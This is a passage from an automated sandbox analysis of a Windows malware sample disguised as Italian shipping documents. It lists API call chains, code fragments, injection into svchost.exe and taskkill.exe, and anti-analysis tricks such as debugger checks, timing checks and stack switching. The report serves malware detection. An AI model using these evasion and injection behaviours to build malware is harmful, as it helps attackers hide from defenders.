            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: AWB_5771388044 Documenti di spedizione.exeStatic PE information: real checksum: 0xa961f should be: 0x15ead1
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D616E push ecx; ret 1_2_004D616F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D2198 push esi; ret 1_2_004D21B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D32A0 push eax; ret 1_2_004D32A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D834F push ss; retf 1_2_004D8355
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004EA3CE push 59B866C6h; iretd 1_2_004EA442
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004EA3D3 push 59B866C6h; iretd 1_2_004EA442
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E4417 push ebx; iretd 1_2_004E4427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D84CC push ds; iretd 1_2_004D84D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E7D4D push es; retf 1_2_004E7D4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E955E push ds; iretd 1_2_004E9561
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004D1E1E pushad ; retf 1_2_004D1E55
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004DCE8C push edx; retf 1_2_004DCE8D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E7F58 pushfd ; retf 1_2_004E7F59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2A04A push eax; ret 5_2_08F2A04B
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F18247 push ecx; ret 5_2_08F18248
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F1C37B push ss; retf 5_2_08F1C37E
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2C4A7 push 59B866C6h; iretd 5_2_08F2C51B
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2C4AC push 59B866C6h; iretd 5_2_08F2C51B
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F27DDE push es; ret 5_2_08F27DB7
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F27DAB push es; ret 5_2_08F27DB7
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F27E74 push 00000003h; retf 5_2_08F27E73
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F27E44 push 00000003h; retf 5_2_08F27E73
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F2B637 push ds; iretd 5_2_08F2B63A
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeCode function: 5_2_08F29E26 push es; retf 5_2_08F29E28
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050027FA pushad ; ret 6_2_050027F9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0500225F pushad ; ret 6_2_050027F9
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_050309AD push ecx; mov dword ptr [esp], ecx6_2_050309B6
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0500283D push eax; iretd 6_2_05002858
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeAPI/Special instruction interceptor: Address: 4172244
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\taskkill.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\taskkill.exeWindow / User API: threadDelayed 9822Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\taskkill.exeAPI coverage: 2.5 %
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe TID: 7736Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe TID: 7736Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724Thread sleep count: 150 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724Thread sleep count: 9822 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exe TID: 7724Thread sleep time: -19644000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\taskkill.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_02B4C360 FindFirstFileW,FindNextFileW,FindClose,6_2_02B4C360
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3592340296.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000007.00000002.2419008483.00000220B6BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZZ
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004E7563 LdrLoadDll,1_2_004E7563
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_041724B0 mov eax, dword ptr fs:[00000030h]0_2_041724B0
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_04172510 mov eax, dword ptr fs:[00000030h]0_2_04172510
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_04170E80 mov eax, dword ptr fs:[00000030h]0_2_04170E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
